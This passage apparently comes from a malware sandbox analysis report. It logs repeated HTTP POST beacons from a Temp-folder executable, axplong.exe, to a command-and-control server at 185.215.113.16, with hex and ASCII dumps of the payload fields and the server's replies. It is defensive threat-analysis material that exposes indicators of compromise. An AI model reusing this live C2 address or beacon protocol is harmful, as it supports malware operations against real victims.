                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:29.083080053 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.649744185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:29.261415958 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:29.961617947 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:29.963866949 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:30.191232920 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.649746185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:30.299949884 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:31.020965099 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:31.021889925 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:31.246807098 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.649747185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:31.363454103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:32.052800894 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:32.053829908 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:32.276709080 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.649748185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:32.394277096 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:33.131731033 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:33.132818937 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:33.369824886 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.649749185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:33.487636089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:34.185514927 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:34.603547096 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:34.830221891 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.649750185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:34.941252947 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:35.641802073 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:35.642966986 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:35.866833925 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.649751185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:36.258687019 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:37.126147985 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:37.132106066 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:37.368777990 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.649752185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:37.487869978 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:38.355880976 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:38.359211922 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:38.586429119 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.649753185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:38.706530094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:39.415940046 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:39.416851997 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:39.646142960 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.649754185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:39.753189087 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:40.447009087 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:40.447995901 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:40.870287895 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.649755185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:41.217859030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:41.919539928 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:41.950927019 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:42.178738117 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.649756185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:43.281311989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:44.007570982 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
